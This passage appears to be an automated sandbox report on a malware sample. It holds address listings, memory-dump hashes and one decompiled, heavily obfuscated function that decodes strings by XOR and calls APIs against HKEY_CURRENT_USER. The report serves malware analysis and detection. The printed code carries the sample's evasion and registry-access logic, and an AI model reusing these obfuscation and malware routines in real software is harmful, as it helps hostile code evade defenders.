                                                                                                                                                        0x012d371c
                                                                                                                                                        0x012d3723
                                                                                                                                                        0x012d3728
                                                                                                                                                        0x012d372e
                                                                                                                                                        0x012d3734
                                                                                                                                                        0x012d373c
                                                                                                                                                        0x012d3743
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3743
                                                                                                                                                        0x012d2f5a
                                                                                                                                                        0x012d2f6c
                                                                                                                                                        0x012d2f72
                                                                                                                                                        0x012d2f78
                                                                                                                                                        0x012d2f80
                                                                                                                                                        0x012d2f8e
                                                                                                                                                        0x012d2f94
                                                                                                                                                        0x012d2f9a
                                                                                                                                                        0x012d2fa2
                                                                                                                                                        0x012d2fab
                                                                                                                                                        0x012d2fb0
                                                                                                                                                        0x012d2fb6
                                                                                                                                                        0x012d2fbc
                                                                                                                                                        0x012d2fc1
                                                                                                                                                        0x012d2fc4
                                                                                                                                                        0x012d2fc6
                                                                                                                                                        0x012d2fcb
                                                                                                                                                        0x012d2fcb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2f5a
                                                                                                                                                        0x012d2d42
                                                                                                                                                        0x012d34a6
                                                                                                                                                        0x012d34aa
                                                                                                                                                        0x012d34af
                                                                                                                                                        0x012d34b5
                                                                                                                                                        0x012d34bb
                                                                                                                                                        0x012d34c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2d48
                                                                                                                                                        0x012d2d4d
                                                                                                                                                        0x012d34c8
                                                                                                                                                        0x012d34dd
                                                                                                                                                        0x012d2d53
                                                                                                                                                        0x012d2d58
                                                                                                                                                        0x012d2d5e
                                                                                                                                                        0x012d2d65
                                                                                                                                                        0x012d2d65
                                                                                                                                                        0x012d2d58
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2d4d
                                                                                                                                                        0x012d2d42
                                                                                                                                                        0x012d2cb4
                                                                                                                                                        0x012d2daf
                                                                                                                                                        0x012d3044
                                                                                                                                                        0x012d37c9
                                                                                                                                                        0x012d37d1
                                                                                                                                                        0x012d37dd
                                                                                                                                                        0x012d37e4
                                                                                                                                                        0x012d37f3
                                                                                                                                                        0x012d37f8
                                                                                                                                                        0x012d37fe
                                                                                                                                                        0x012d3804
                                                                                                                                                        0x012d3809
                                                                                                                                                        0x012d3811
                                                                                                                                                        0x012d3820
                                                                                                                                                        0x012d304a
                                                                                                                                                        0x012d304f
                                                                                                                                                        0x012d3055
                                                                                                                                                        0x012d305a
                                                                                                                                                        0x012d305a
                                                                                                                                                        0x012d304f
                                                                                                                                                        0x012d2db5
                                                                                                                                                        0x012d2dba
                                                                                                                                                        0x012d3555
                                                                                                                                                        0x012d355b
                                                                                                                                                        0x012d3561
                                                                                                                                                        0x012d3569
                                                                                                                                                        0x012d3577
                                                                                                                                                        0x012d357d
                                                                                                                                                        0x012d3583
                                                                                                                                                        0x012d358b
                                                                                                                                                        0x012d358d
                                                                                                                                                        0x012d3594
                                                                                                                                                        0x012d3599
                                                                                                                                                        0x012d359f
                                                                                                                                                        0x012d35a5
                                                                                                                                                        0x012d35aa
                                                                                                                                                        0x012d35ad
                                                                                                                                                        0x012d35af
                                                                                                                                                        0x012d35b7
                                                                                                                                                        0x012d35c5
                                                                                                                                                        0x012d35cc
                                                                                                                                                        0x012d35d1
                                                                                                                                                        0x012d2dc0
                                                                                                                                                        0x012d2dc5
                                                                                                                                                        0x012d35e8
                                                                                                                                                        0x012d2dcb
                                                                                                                                                        0x012d2dd0
                                                                                                                                                        0x012d2dd6
                                                                                                                                                        0x012d2deb
                                                                                                                                                        0x012d2df0
                                                                                                                                                        0x012d2df0
                                                                                                                                                        0x012d2dd0
                                                                                                                                                        0x012d2dc5
                                                                                                                                                        0x012d2dba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2daf
                                                                                                                                                        0x012d2cbf
                                                                                                                                                        0x012d2ef2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2efd
                                                                                                                                                        0x012d2f0e
                                                                                                                                                        0x012d2f13
                                                                                                                                                        0x012d2f13
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2efd
                                                                                                                                                        0x012d2cca
                                                                                                                                                        0x012d332e
                                                                                                                                                        0x012d333d
                                                                                                                                                        0x012d3342
                                                                                                                                                        0x012d3347
                                                                                                                                                        0x012d3351
                                                                                                                                                        0x012d3354
                                                                                                                                                        0x012d3364
                                                                                                                                                        0x012d3369
                                                                                                                                                        0x012d336e
                                                                                                                                                        0x012d3373
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3373
                                                                                                                                                        0x012d2cd5
                                                                                                                                                        0x012d3385
                                                                                                                                                        0x012d338d
                                                                                                                                                        0x012d339d
                                                                                                                                                        0x012d33a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d33a2
                                                                                                                                                        0x012d2ce0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2ce6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2ce6
                                                                                                                                                        0x012d2ce0
                                                                                                                                                        0x012d2c54
                                                                                                                                                        0x012d2bb0
                                                                                                                                                        0x012d2bb7
                                                                                                                                                        0x012d2bb7
                                                                                                                                                        0x012d2bc2
                                                                                                                                                        0x012d2bd6
                                                                                                                                                        0x012d2bdd
                                                                                                                                                        0x012d2be0
                                                                                                                                                        0x012d2be3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d2bb7

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: DU>$DU>$/#E$/#E$/#E
                                                                                                                                                        • API String ID: 0-89119021
                                                                                                                                                        • Opcode ID: e8be5077642af991e22068553a96fc1643a36f35feaf0e80518a7584f3576812
                                                                                                                                                        • Instruction ID: 5db53346a5cc06c761abfaf79d38c8bbd4cabed58faa0317cb264945896a0e3a
                                                                                                                                                        • Opcode Fuzzy Hash: e8be5077642af991e22068553a96fc1643a36f35feaf0e80518a7584f3576812
                                                                                                                                                        • Instruction Fuzzy Hash: 4E5204723286C18ADB38DB59F54476EA6A5F785B84F10441ADB8ECBF48DF78C4468B02
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012DA8E0, Relevance: 5.6, Strings: 4, Instructions: 609COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 59%
                                                                                                                                                        			E012DA8E0(long long __rcx) {
				signed long long _v72;
				long long _v80;
				signed long long _v88;
				long long _v96;
				void* _v104;
				void* _v112;
				long long _v120;
				long long _v128;
				signed long long _v136;
				signed int _v140;
				long long _v152;
				void* _v160;
				long long _v168;
				signed long long _v176;
				void* _v184;
				void* _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				long long _v208;
				signed long long _v216;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				signed int _v348;
				void* _v352;
				intOrPtr _v356;
				signed long long _v368;
				long long _v376;
				long long _v384;
				long long _v392;
				void* _t290;
				void* _t401;
				long long _t413;
				signed long long _t415;
				signed long long _t417;
				long long _t418;
				long long _t420;
				signed long long _t429;
				signed long long _t430;
				signed long long _t438;
				long long _t447;
				void* _t452;
				void* _t454;
				void* _t458;
				long long _t463;
				long long _t465;

				_t430 = __rcx;
				_t447 = __rcx;
				_t465 =  &_v192;
				_v128 = _t465;
				_t413 = _v128;
				 *_t465 = 0;
				E012DCDB9(0xa, _t413);
				_v184 = _t413;
				E012DCDB9(0x64, _t413);
				_v120 = _t413;
				_v112 = _t447 + 0xaa4;
				_t415 = _v112;
				_v140 = ( *_t415 ^ 0xffffffef) &  *_t415;
				_t429 =  &_v352 | _t415;
				_v80 = _t447 + 0xab8;
				_t417 = _t447 + 0x2bc;
				_v88 = _t417;
				_v96 = _t447;
				_t463 = _t447 + 0x872;
				_t255 = 0x5027d5f0;
				r15d = 0xe8cc1edd;
				while(1) {
					L1:
					_v216 = _t430;
					L2:
					while(1) {
						L2:
						while(_t255 > 0x168e06be) {
							if(_t255 > 0x379b7277) {
								if(_t255 <= 0x5027d5ef) {
									if(_t255 == 0x379b7278) {
										r13d = _v356;
										r13d = r13d + 1;
										_t255 = 0xc32d9c1;
										continue;
									}
									if(_t255 == 0x44c06beb) {
										_v352 = bpl;
										_v348 = 0x37f4150c;
										_v344 = 0x78ff0330;
										if(_v352 != bpl) {
											L81:
											_t430 = _v184;
											_t438 = _t429;
											r8d = 8;
											L82:
											E012DC96E(_t255, _t430, _t438);
											_t255 = 0x1f90feb9;
											continue;
										}
										do {
											 *(_t452 + 0x4c + _t417 * 4) = ( *(_t452 + 0x4c + _t417 * 4) & 0x5899ac94 |  !( *(_t452 + 0x4c + _t417 * 4)) & 0xa766536b) ^ 0xdffc3335;
											_t255 = 1;
										} while (_t417 == 0);
										goto L81;
									}
									if(_t255 == 0x4503fe33) {
										_v152 = _v176;
										_t417 = _v112;
										_v196 =  *_t417;
										_t255 =  ==  ? 0xb8f2f0e4 : 0xf6561ee3;
									}
									continue;
								}
								if(_t255 > 0x712cc1e9) {
									if(_t255 == 0x712cc1ea) {
										r8d = 0x96bc22d6;
										r9d = 0xe0;
										E012DFAD7(2, _t401, _t417, _t430);
										_t430 = _v192;
										 *_t417();
										_t255 = 0x7451cd36;
										continue;
									}
									if(_t255 != 0x7451cd36) {
										continue;
									}
									r8d = 0;
									r9d = 0;
									E012D8598(_t417, _v96, _v96 + 0x668, _t462);
									return 1;
								}
								if(_t255 == 0x5027d5f0) {
									_t255 =  ==  ? 0x18e2ce36 : 0x5a2c00bf;
									continue;
								}
								if(_t255 != 0x5a2c00bf) {
									continue;
								}
								_v352 = bpl;
								_v348 = 0x614f9309;
								if(_v352 == bpl) {
									_t266 = _v348;
									_t255 = _v348 & 0x9ede19a4 |  !_t266 & 0x6121e65b;
									_v348 = _v348 & 0x9ede19a4 |  !_t266 & 0x6121e65b;
								}
								_t430 = _v184;
								_t438 = _t429;
								r8d = 4;
								goto L82;
							}
							if(_t255 <= 0x1f90feb8) {
								if(_t255 == 0x168e06bf) {
									_v352 = bpl;
									_v348 = 0x5d82976;
									_v344 = 0x14cc2752;
									_v340 = 0x12d70b79;
									_v336 = 0x1ecd2957;
									_v332 = 0x26e23243;
									_v328 = 0x1eda284c;
									_v324 = 0x32e23552;
									_v320 = 0x14cc3450;
									_v316 = 0x14e8324b;
									_v312 = 0x1ed73557;
									_v308 = 0x71be464b;
									if(_v352 != bpl) {
										L74:
										r8d = 0x6e0c8ed2;
										r9d = 0xd6;
										E012DFAD7(2, _t401, _t417, _t430);
										_v392 = _t465;
										_t430 = 0x80000001;
										r8d = 0;
										r9d = 4;
										 *_t417();
										_t255 =  ==  ? 0xdc3ec930 : 0x84ad030e;
										continue;
									}
									do {
										 *(_t452 + 0x48 + _t417 * 4) = ( *(_t452 + 0x48 + _t417 * 4) & 0xd748046d |  !( *(_t452 + 0x48 + _t417 * 4)) & 0x28b7fb92) ^ 0x5909bdb7;
										_t430 = _t430 + 1;
										_t417 = _t417 + 1;
									} while (_t417 != 0xc);
									goto L74;
								}
								if(_t255 == 0x18e2ce36) {
									_t255 =  ==  ? 0x44c06beb : 0x5a2c00bf;
									continue;
								}
								if(_t255 != 0x1a00302e) {
									continue;
								}
								_v352 = bpl;
								_v348 = 0x4f3a31ae;
								_v344 = 0x6a1a42f8;
								if(_v352 != bpl) {
									L40:
									_t430 = _v368;
									_t462 = _v168;
									E012E020E(_t417, _t430, _t429, _v152, _v168);
									_t417 = _v208 + 0x6c;
									L87:
									_v136 = _t417;
									_t255 = 0x274e8135;
									continue;
								}
								do {
									 *(_t452 + 0x4c + _t417 * 4) =  *(_t452 + 0x4c + _t417 * 4) & 0x95e5bd74 |  !( *(_t452 + 0x4c + _t417 * 4)) & 0x6a1a428b;
								} while (_t417 == 0);
								goto L40;
							}
							if(_t255 > 0x2b872d16) {
								if(_t255 == 0x2b872d17) {
									_t417 = _v160;
									_t255 =  ==  ? 0xb2c3da8d : 0x1a00302e;
								} else {
									if(_t255 == 0x36912e25) {
										E012DCDB9(0x1f4, _t417);
										_v368 = _t417;
										_v208 = _v80;
										_v168 = _v208 + _t430;
										_v104 = _v88;
										_v160 = _t463;
										_t417 = _v160;
										_t255 =  ==  ? 0x4503fe33 : 0x98abedfc;
										_t430 = _v104;
										_v176 = _t430;
									}
								}
								continue;
							}
							if(_t255 == 0x1f90feb9) {
								_v352 = bpl;
								_v348 = 0x2b4ad400;
								_v344 = 0x3a5eda24;
								_v340 = 0x3c45f60f;
								_v336 = 0x305fd421;
								_v332 = 0x870cf35;
								_v328 = 0x3048d53a;
								_v324 = 0x1c70c824;
								_v320 = 0x3a5ec926;
								_v316 = 0x3a7acf3d;
								_v312 = 0x3045c821;
								_v308 = 0x2c09e73d;
								_v304 = 0x5f2cbb53;
								if(_v352 != bpl) {
									L68:
									E012E020E(_t417, _v120, _t429, _v184, _t462);
									r8d = 0x6e0c8ed2;
									r9d = 0xd6;
									E012DFAD7(2, _t401, _t417, _v120);
									_v392 = _t465;
									_t430 = 0x80000001;
									r8d = 0;
									r9d = 2;
									_v200 =  *_t417();
									_t255 =  ==  ? 0x168e06bf : 0x835416f8;
									continue;
								}
								do {
									 *(_t452 + 0x48 + _t417 * 4) =  *(_t452 + 0x48 + _t417 * 4) & 0xa0d344ac |  !( *(_t452 + 0x48 + _t417 * 4)) & 0x5f2cbb53;
									_t430 = _t430 + 1;
									_t417 = _t417 + 1;
								} while (_t417 != 0xd);
								goto L68;
							} else {
								if(_t255 == 0x274e8135) {
									_t417 = _v136;
									_v72 = _t417;
									_t255 = 0xc32d9c1;
									r13d = 0;
								}
								continue;
							}
						}
						if(_t255 > 0xd7604324) {
							if(_t255 <= 0xf5c8adac) {
								if(_t255 == 0xd7604325) {
									_v216 = _t417;
									r8d = 0x96bc22d6;
									r9d = 0xe0;
									E012DFAD7(2, _t401, _t417, _t430);
									_t430 = _v192;
									 *_t417();
									_t255 = 0xe8cc1edd;
									continue;
								}
								if(_t255 == 0xdc3ec930) {
									r8d = 0x6a44d3e0;
									r9d = 0xf4;
									E012DFAD7(2, _t401, _t417, _t430);
									_t430 = _v192;
									 *_t417();
									_t290 = 0xd7604325;
									L93:
									_t255 =  ==  ? r15d : _t290;
									while(1) {
										L1:
										_v216 = _t430;
										goto L2;
									}
								}
								if(_t255 == 0xe8cc1edd) {
									_t417 = _v216;
									_t255 =  ==  ? 0x7451cd36 : 0x36912e25;
								}
								continue;
							}
							if(_t255 > 0x664c0d6) {
								if(_t255 == 0x664c0d7) {
									L90:
									_t255 = 0xe8cc1edd;
									goto L1;
								}
								if(_t255 == 0xc32d9c1) {
									_v356 = r13d;
									_t430 = _v368;
									_t255 =  ==  ? 0xa06c8638 : 0x379b7278;
								}
								continue;
							}
							if(_t255 == 0xf5c8adad) {
								_t430 = _v368;
								E012DCC2E(_t417, _t430);
								_t255 = 0x712cc1ea;
								continue;
							}
							if(_t255 != 0xf6561ee3) {
								continue;
							}
							_t458 = _v208 + 0x6c;
							_v352 = bpl;
							_v348 = 0xc96c11e;
							_v344 = 0x297d418;
							_v340 = 0x50d2cf52;
							_v336 = 0x47dccb18;
							_v332 = 0x43d2c905;
							_v328 = 0x6ad2c819;
							_v324 = 0x7ea7ef36;
							_v320 = 0x5694c32e;
							_v316 = 0x4780cd0a;
							_v312 = 0x419be121;
							_v308 = 0x4d81c30f;
							_v304 = 0x75aed81b;
							_v300 = 0x4d96c214;
							_v296 = 0x61aedf0a;
							_v292 = 0x4780de08;
							_v288 = 0x47a4d813;
							_v284 = 0x4d9bdf0f;
							_v280 = 0x57a0f013;
							_v276 = 0x44dd8c13;
							_v272 = 0x284835d;
							_v268 = 0xdd2df58;
							_v264 = 0x67a08c09;
							_v260 = 0x78a1f33a;
							_v256 = 0x296835d;
							_v252 = 0x51d78e21;
							_v248 = 0x7e81895d;
							_v244 = 0x2d48c5f;
							_v240 = 0x5093d80e;
							_v236 = 0xae8c09;
							_v232 = 0x2d0f035;
							_v228 = 0x7d2df58;
							_v224 = 0x22f2ac0e;
							if(_v352 != bpl) {
								L22:
								_t430 = _v368;
								_t420 = _v168;
								_t462 = _v152;
								_v376 = _t420;
								_v384 = _v152;
								_v392 = _t420;
								E012E020E(_t420, _t430, _t429, _t458, _v152);
								_t417 = _v368;
								_t255 = 0x712cc1ea;
								continue;
							} else {
								do {
									 *(_t452 + 0x4c + _t417 * 4) = ( *(_t452 + 0x4c + _t417 * 4) & 0x2cec6f53 |  !( *(_t452 + 0x4c + _t417 * 4)) & 0xd31390ac) ^ 0xf1e13cd1;
									_t417 = _t417 + 1;
								} while (_t417 != 0x20);
								goto L22;
							}
						}
						if(_t255 <= 0x98abedfb) {
							if(_t255 == 0x835416f8) {
								_t290 = 0x664c0d7;
								goto L93;
							}
							if(_t255 == 0x84ad030e) {
								goto L90;
							}
							if(_t255 == 0x8ef2779b) {
								_t255 = 0xf5c8adad;
							}
							continue;
						}
						if(_t255 > 0xb2c3da8c) {
							if(_t255 == 0xb2c3da8d) {
								_t454 = _v208 + 0x6c;
								_v352 = bpl;
								_v348 = 0x4c62decd;
								_v344 = 0x4263cbcb;
								_v340 = 0x1026d081;
								_v336 = 0x728d4cb;
								_v332 = 0x326d6d6;
								_v328 = 0x2a26d7ca;
								_v324 = 0x3e53f0e5;
								_v320 = 0x1660dcfd;
								_v316 = 0x774d2d9;
								_v312 = 0x16ffef2;
								_v308 = 0xd75dcdc;
								_v304 = 0x355ac7c8;
								_v300 = 0xd62ddc7;
								_v296 = 0x215ac0d9;
								_v292 = 0x774c1db;
								_v288 = 0x750c7c0;
								_v284 = 0xd6fc0dc;
								_v280 = 0x1754efc0;
								_v276 = 0x42993c0;
								_v272 = 0x42709c8e;
								_v268 = 0x4d26c08b;
								_v264 = 0x275493da;
								_v260 = 0x3855ece9;
								_v256 = 0x42629c8e;
								_v252 = 0x4275968c;
								_v248 = 0x4224c08b;
								_v244 = 0x16759388;
								_v240 = 0x4272c1cf;
								_v236 = 0x4224fb8c;
								_v232 = 0x4726c08b;
								_v228 = 0x6206b3dd;
								if(_v352 != bpl) {
									L86:
									_t430 = _v368;
									_t418 = _v168;
									_v376 = _t418;
									_v384 = _v152;
									_v392 = _t418;
									E012E020E(_t418, _t430, _t429, _t454, _v152);
									_t417 = _v208 + 0x4c;
									goto L87;
								}
								do {
									 *(_t452 + 0x48 + _t417 * 4) =  *(_t452 + 0x48 + _t417 * 4) & 0x9df94c51 |  !( *(_t452 + 0x48 + _t417 * 4)) & 0x6206b3ae;
									_t430 = _t430 + 1;
									_t417 = _t417 + 1;
								} while (_t417 != 0x20);
								goto L86;
							}
							if(_t255 == 0xb8f2f0e4) {
								_t255 =  ==  ? 0x2b872d17 : 0x1a00302e;
							}
							continue;
						}
						if(_t255 == 0x98abedfc) {
							E012DCDB9(0x3e8, _t417);
							_v176 = _t417;
							_v352 = bpl;
							_v348 = 0x2fcf5401;
							_v344 = 0x71ca0757;
							_v340 = 0x2ef2724;
							if(_v352 != bpl) {
								L64:
								_t462 = _v104;
								_t430 = _v176;
								E012E020E(_t417, _t430, _t429, _v160, _v104);
								_t255 = 0x4503fe33;
								continue;
							}
							do {
								 *(_t452 + 0x48 + _t417 * 4) = ( *(_t452 + 0x48 + _t417 * 4) & 0x68f1fcb9 |  !( *(_t452 + 0x48 + _t417 * 4)) & 0x970e0346) ^ 0x95e12462;
								_t430 = _t430 + 1;
								_t417 = _t417 + 1;
							} while (_t417 != 4);
							goto L64;
						} else {
							if(_t255 == 0xa06c8638) {
								r12d = _v356;
								r8d = 0xd31a9c34;
								r9d = 0xe3;
								E012DFAD7(2, _t401, _t417, _t430);
								_v384 = r12d;
								r15d = 0xe8cc1edd;
								_v392 = _v368;
								_t430 = _v192;
								r8d = 0;
								r9d = 1;
								 *_t417();
								_t255 =  ==  ? 0xf5c8adad : 0x8ef2779b;
							}
							continue;
						}
					}
				}
			}













































































                                                                                                                                                        0x012da8e0
                                                                                                                                                        0x012da8f3
                                                                                                                                                        0x012da8f6
                                                                                                                                                        0x012da8fe
                                                                                                                                                        0x012da906
                                                                                                                                                        0x012da90e
                                                                                                                                                        0x012da91a
                                                                                                                                                        0x012da91f
                                                                                                                                                        0x012da92c
                                                                                                                                                        0x012da931
                                                                                                                                                        0x012da940
                                                                                                                                                        0x012da948
                                                                                                                                                        0x012da959
                                                                                                                                                        0x012da96a
                                                                                                                                                        0x012da974
                                                                                                                                                        0x012da97c
                                                                                                                                                        0x012da983
                                                                                                                                                        0x012da98b
                                                                                                                                                        0x012da993
                                                                                                                                                        0x012da99a
                                                                                                                                                        0x012da99f
                                                                                                                                                        0x012da9a7
                                                                                                                                                        0x012da9a7
                                                                                                                                                        0x012da9a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da9af
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da9af
                                                                                                                                                        0x012daa6d
                                                                                                                                                        0x012daca4
                                                                                                                                                        0x012dae12
                                                                                                                                                        0x012db28d
                                                                                                                                                        0x012db292
                                                                                                                                                        0x012db295
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db295
                                                                                                                                                        0x012dae1d
                                                                                                                                                        0x012db29f
                                                                                                                                                        0x012db2a4
                                                                                                                                                        0x012db2ac
                                                                                                                                                        0x012db2b9
                                                                                                                                                        0x012db2e7
                                                                                                                                                        0x012db2e7
                                                                                                                                                        0x012db2ef
                                                                                                                                                        0x012db2f2
                                                                                                                                                        0x012db2f8
                                                                                                                                                        0x012db2f8
                                                                                                                                                        0x012db2fd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db2fd
                                                                                                                                                        0x012db2bd
                                                                                                                                                        0x012db2d9
                                                                                                                                                        0x012db2e0
                                                                                                                                                        0x012db2e0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db2bd
                                                                                                                                                        0x012dae28
                                                                                                                                                        0x012dae36
                                                                                                                                                        0x012dae3e
                                                                                                                                                        0x012dae48
                                                                                                                                                        0x012dae67
                                                                                                                                                        0x012dae67
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dae28
                                                                                                                                                        0x012dacaf
                                                                                                                                                        0x012daf7b
                                                                                                                                                        0x012db4f0
                                                                                                                                                        0x012db4f6
                                                                                                                                                        0x012db4fc
                                                                                                                                                        0x012db501
                                                                                                                                                        0x012db504
                                                                                                                                                        0x012db506
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db506
                                                                                                                                                        0x012daf86
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db57f
                                                                                                                                                        0x012db582
                                                                                                                                                        0x012db585
                                                                                                                                                        0x012db5a7
                                                                                                                                                        0x012db5a7
                                                                                                                                                        0x012dacba
                                                                                                                                                        0x012db158
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db158
                                                                                                                                                        0x012dacc5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012daccb
                                                                                                                                                        0x012dacd0
                                                                                                                                                        0x012dacdd
                                                                                                                                                        0x012dacdf
                                                                                                                                                        0x012dacf2
                                                                                                                                                        0x012dacf4
                                                                                                                                                        0x012dacf4
                                                                                                                                                        0x012dacf8
                                                                                                                                                        0x012dad00
                                                                                                                                                        0x012dad03
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dad03
                                                                                                                                                        0x012daa78
                                                                                                                                                        0x012dad3e
                                                                                                                                                        0x012db160
                                                                                                                                                        0x012db165
                                                                                                                                                        0x012db16d
                                                                                                                                                        0x012db175
                                                                                                                                                        0x012db17d
                                                                                                                                                        0x012db185
                                                                                                                                                        0x012db18d
                                                                                                                                                        0x012db195
                                                                                                                                                        0x012db19d
                                                                                                                                                        0x012db1a5
                                                                                                                                                        0x012db1ad
                                                                                                                                                        0x012db1b5
                                                                                                                                                        0x012db1c2
                                                                                                                                                        0x012db1f7
                                                                                                                                                        0x012db1fe
                                                                                                                                                        0x012db204
                                                                                                                                                        0x012db20a
                                                                                                                                                        0x012db20f
                                                                                                                                                        0x012db214
                                                                                                                                                        0x012db21e
                                                                                                                                                        0x012db221
                                                                                                                                                        0x012db227
                                                                                                                                                        0x012db235
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db235
                                                                                                                                                        0x012db1cb
                                                                                                                                                        0x012db1e7
                                                                                                                                                        0x012db1eb
                                                                                                                                                        0x012db1ee
                                                                                                                                                        0x012db1f1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db1cb
                                                                                                                                                        0x012dad49
                                                                                                                                                        0x012db24c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db24c
                                                                                                                                                        0x012dad54
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dad5a
                                                                                                                                                        0x012dad5f
                                                                                                                                                        0x012dad67
                                                                                                                                                        0x012dad74
                                                                                                                                                        0x012dad9c
                                                                                                                                                        0x012dad9c
                                                                                                                                                        0x012dada1
                                                                                                                                                        0x012dadb4
                                                                                                                                                        0x012dadc1
                                                                                                                                                        0x012db4b2
                                                                                                                                                        0x012db4b2
                                                                                                                                                        0x012db4ba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db4ba
                                                                                                                                                        0x012dad78
                                                                                                                                                        0x012dad8e
                                                                                                                                                        0x012dad95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dad78
                                                                                                                                                        0x012daa83
                                                                                                                                                        0x012daeaf
                                                                                                                                                        0x012db4c4
                                                                                                                                                        0x012db4d9
                                                                                                                                                        0x012daeb5
                                                                                                                                                        0x012daeba
                                                                                                                                                        0x012daec5
                                                                                                                                                        0x012daeca
                                                                                                                                                        0x012daed7
                                                                                                                                                        0x012daeef
                                                                                                                                                        0x012daeff
                                                                                                                                                        0x012daf07
                                                                                                                                                        0x012daf0f
                                                                                                                                                        0x012daf24
                                                                                                                                                        0x012daf27
                                                                                                                                                        0x012daf2f
                                                                                                                                                        0x012daf2f
                                                                                                                                                        0x012daeba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012daeaf
                                                                                                                                                        0x012daa8e
                                                                                                                                                        0x012db024
                                                                                                                                                        0x012db029
                                                                                                                                                        0x012db031
                                                                                                                                                        0x012db039
                                                                                                                                                        0x012db041
                                                                                                                                                        0x012db049
                                                                                                                                                        0x012db051
                                                                                                                                                        0x012db059
                                                                                                                                                        0x012db061
                                                                                                                                                        0x012db069
                                                                                                                                                        0x012db071
                                                                                                                                                        0x012db079
                                                                                                                                                        0x012db081
                                                                                                                                                        0x012db08e
                                                                                                                                                        0x012db0bd
                                                                                                                                                        0x012db0d0
                                                                                                                                                        0x012db0e4
                                                                                                                                                        0x012db0ea
                                                                                                                                                        0x012db0f0
                                                                                                                                                        0x012db0f5
                                                                                                                                                        0x012db0fa
                                                                                                                                                        0x012db104
                                                                                                                                                        0x012db107
                                                                                                                                                        0x012db10f
                                                                                                                                                        0x012db12a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db12a
                                                                                                                                                        0x012db097
                                                                                                                                                        0x012db0ad
                                                                                                                                                        0x012db0b1
                                                                                                                                                        0x012db0b4
                                                                                                                                                        0x012db0b7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012daa94
                                                                                                                                                        0x012daa99
                                                                                                                                                        0x012daa9f
                                                                                                                                                        0x012daaa7
                                                                                                                                                        0x012daaaf
                                                                                                                                                        0x012daab4
                                                                                                                                                        0x012daab4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012daa99
                                                                                                                                                        0x012daa8e
                                                                                                                                                        0x012da9bf
                                                                                                                                                        0x012daac1
                                                                                                                                                        0x012dadcf
                                                                                                                                                        0x012db25e
                                                                                                                                                        0x012db26d
                                                                                                                                                        0x012db273
                                                                                                                                                        0x012db279
                                                                                                                                                        0x012db27e
                                                                                                                                                        0x012db281
                                                                                                                                                        0x012db283
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012db283
                                                                                                                                                        0x012dadda
                                                                                                                                                        0x012db542
                                                                                                                                                        0x012db548
                                                                                                                                                        0x012db54e
                                                                                                                                                        0x012db553
                                                                                                                                                        0x012db55c
                                                                                                                                                        0x012db560
                                                                                                                                                        0x012db565
                                                                                                                                                        0x012db565
                                                                                                                                                        0x012da9a7
                                                                                                                                                        0x012da9a7
                                                                                                                                                        0x012da9a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da9a7
                                                                                                                                                        0x012da9a7
                                                                                                                                                        0x012dade5
                                                                                                                                                        0x012dadeb
                                                                                                                                                        0x012dae05
                                                                                                                                                        0x012dae05
